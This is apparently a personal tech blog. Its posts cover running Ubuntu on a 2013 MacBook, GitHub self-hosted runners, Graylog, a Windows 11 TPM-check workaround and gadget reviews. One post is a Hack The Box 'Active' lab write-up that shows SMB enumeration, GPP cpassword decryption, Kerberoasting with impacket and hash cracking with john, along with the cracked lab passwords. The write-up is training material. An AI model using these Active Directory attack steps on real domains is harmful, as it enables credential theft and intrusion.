Category: Technology

Install Ubuntu on a old Mac

I have a old MacBook Pro, from around 2013. This stable old laptop have been wonderful. Sadly support for this machine ended long time ago, so why not test something different?

I’ve used Linux on laptops at work before, and for coding and working it is ok. My machine have a Intel CPU and 8GB of memory, so modern Ubuntu should work decent. My first try failed hard, downloading the newest Ubuntu Desktop, it just gave me a black screen after booting from the usbdrive.

Well, after a lot of googling someone mentioned a legacy installer, and this did the trick. The newest version of Ubuntu with this is 23.10.1, but you can do the usual upgrade and I’m now running 25.10 on my machine.

The download link for this is https://mirror.ucu.ac.ug/ubuntu-cdimage/releases/23.10.1/release/ubuntu-23.10-desktop-legacy-amd64.iso

Good luck running Ubuntu on your old Mac 🙂

Github and Local Runners

Using github when coding is a lifesaver, both for work and private projects. Most of my own projects are private repo’s, and it makes it easy to jump in and do changes where ever you are.

One of the projects is a python script that connects to my smart home solution Home Assistant, and generates a html page that is disabled in our living room with temperatures, calendar appointments, weather etc.

When editing this python script, I’ve needed to log into the server and do a git pull, so I always have the latest version. Yes I could use a cronjob or something to do it regular but Github and local runners makes it sooo easy.

Under your repo at Github, choose settings, actions and runners. Here you choose OS, and a step by step guide is generated for you. This installs the local runner on the machine you want, connected to you repo ready for action.

My way to do this is not advanced, a small Action in
Github and a local bash script with “git pull https://apikey@github.com/blablabla/repo.git”

The Action in Github is based on the example file:

# This is a basic workflow that is manually triggered
name: test
# Controls when the action will run. Workflow runs when manually triggered using the UI
# or API.
on:
  push:
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  deployment:
    runs-on: self-hosted
    steps:
    # Runs a single command using the runners shell
    - name: Send greeting
      working-directory: /home/user/folder/
      run: ./bash_script

Graylog, a good alternative

Graylog Dashboard for Apache

Running a home lab is nice, but having some control is even better.
And with control, I mean logging.

I have used Splunk, Qradar and Humio in job related activities over the years, and they have all pros and cons.
The biggest is often the issue related to licenses and complexity.

After setting up a Palo Alto firewall in my home setup, I really needed somewhere to ship the logs. I tried Splunk, but the free version is just missing to much. So i started googling for alternatives and there I found Graylog.

Pretty simple to set up, have a lot of features in the free version(not missing anything yet) and really good documentation.

At the moment I’m sending logs from the firewall, a webserver, a ssh-gateway and my pihole DNS server. I’ve only used syslog and filebeat, but more are supported.

I need to normalize the logs more, but its fun to set up notifications and creating dashboards. And to understand logs is important in most tech jobs, specially InfoSec.

Hack the Box “Active” Walktrough/Writeup

I’ve been playing with htb / Hack The Box for a little while, but I often stumble upon something that gets me stuck.

But this one in the Active Directory 101 path with the name Active is my first one “without” help.

First I did my usual nmap.

nmap -sV --script vuln 10.129.207.101


Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 08:36 BST
Nmap scan report for 10.129.207.101
Host is up (0.051s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-25 07:36:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

I then edited my host file to link the IP to the domain active.htb.

nano /etc/hosts

After that I did some usual smbplay, and ended up with some nice files containing a username and something called cpassword.

smbclient -L 10.129.207.101
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available

smbclient \\\\10.129.207.101\\Replication
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml

active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

I had to google what I’m able to to with the cpasssword, and gpp-decrypt was the first hit.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

I then tried with smbclient again, this time with username and password, and there the userflag was.

smbclient -U active.htb\\SVC_TGS \\\\10.129.207.101\\Users
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

With this user I also was able to use the GetUserSPNs script from impacket to get the administrators password.

impacket-GetUserSPNs -request -dc-ip active.htb active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNs.out

Ticketmaster1968

And yet again there was some smb to get the rootflag.

smb: \Administrator\Desktop\> get root.txt

Error installing Windows 11 virtually

In the last week I have gotten this twice, ” This PC Cant run windows 11 ” ” This PC doesn’t meet the minimum system requirements to install this version of Windows. For more information, visit https://aka.ms/WindowsSysReq

Both times it has been related to virtual machines. The first time was when I tried to install a Windows 11 VM locally with VirtualBox, and the second time was when I tried to set up a Windows 11 machine on a NUC with ESXi.

Well the solution is pretty simple, just follow these steps 🙂 Enjoy your virtual Windows 11 machine.

  1. Start installation and continue until error. Then press back.
  2. Press Shift+F10 to open the Command Prompt.
  3. Type regedit and press the Enter button.
  4. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\Setup.
  5. Right-click on Setup > New > Key.
  6. Name it as LabConfig.
  7. Right-click on LabConfig > New > DWORD (32-bit) Value.
  8. Name it as BypassTPMCheck.
  9. Double-click on it to set the Value data as 1.
  10. Create another DWORD value named BypassSecureBootCheck.
  11. Set the Value data as 1.
  12. Click the OK button.
  13. Exit Command Prompt and try again 🙂

MacBook Pro, what OS? A Journey

My mac

I got an old MacBook Pro, Apple calls it Retina, 13-inches, late 2013.

This machine has never stopped surprising me, still performing well, and has been abused with different OS’s lately.
Parrot OS and Kubuntu are the latest, but it didn’t feel right, mostly because of keyboard setup bugs.

So I thought why not try osX again, and this was not easy.
I did the CMD+R when booting, and ended up with some old version. After installing it I tried downloading the latest version of osX, but I did get some kind of error(yes my machine is too old). Well, I could install El Capitan… So I tried that.

Well, after some downloading I got this error: no packages were eligible for install. Yes.. it seems like it is a date issue and I was able to fix this with the help of this thread: https://apple.stackexchange.com/questions/394259/mac-stuck-in-el-capitan-installer-loop-no-packages-were-eligible-for-install
Some tinkering with the date, and some boots later I finally was able to start El Captian. Then after googling how to install Big Sur(yes this is the newest version of macOS this MacBook pro supports) I somehow found the link that opened App Store.

Oh, I wasn’t done… Filevault needed to do its thing first. And that took around 30 min. And then there was another 30 min to install it.

Have to say that everything isn’t easier with Apple stuff… But in the end I guess I was kind of updated?!

Logitech MX Anywhere 3

I’ve not been using laptops too much in the last few years. When working from home I used my own desktop, so the work laptop was only used the few times I did go to the office.

But with the new job, I got some new work laptops and lost the ability to work from my home computer. In addition to those, I’m trying to use my MacBook Pro, just to play with Mac OS.

Well, multiple machines, and one mouse using a USB cord… Yes, I needed a new mouse. Did some googling, and ended up buying the newest Logitech MX Anywhere… number 3. I have had an older version before, and I did like that one so let’s see if this is as good as I hope.

https://www.logitech.com/no-no/products/mice/mx-anywhere-3.910-005988.html

First of all, some of the specs:

  • Chargeable with USB C
  • Possible to connect to 3 different machines(Switching is done on a button underneath)
  • Works on all surfaces
  • Small and light

The one with 3 different machines was the most important one for me. And It really works well. The battery time promises 70 days but for me, it’s more like 35(but that is good enough).

I’m not using the included dongle, just connecting with Bluetooth. And I’ve connected and used it with Mac OS, Red Hat and Windows, all working perfectly.

The fit is a little hard to explain. It’s small but works with a normal size hand. Also, the horizontal lines on the side of the mouse give a really good grip. The Scrollwheel automatically changes from normal to superduper fast scroll, that is a feature I had to get used to.

Nordvpn, bug on Ubuntu

I have a Nordvpn account, mostly used for some kind of protection when using public WiFi. Its also great to use when you try to be from somewhere else.

But when I tried to install and use it on my laptop with Ubuntu i got an error, basically telling me to try again or contact support.

First I looked in the logs, but not seeing something i easily could fix, and after a reinstall of the application i contacted support. Got a quick response and the fix is doing this:

sudo ln -s /usr/bin/resolvectl /usr/bin/systemd-resolve

Use it in with care, but it helped me 😀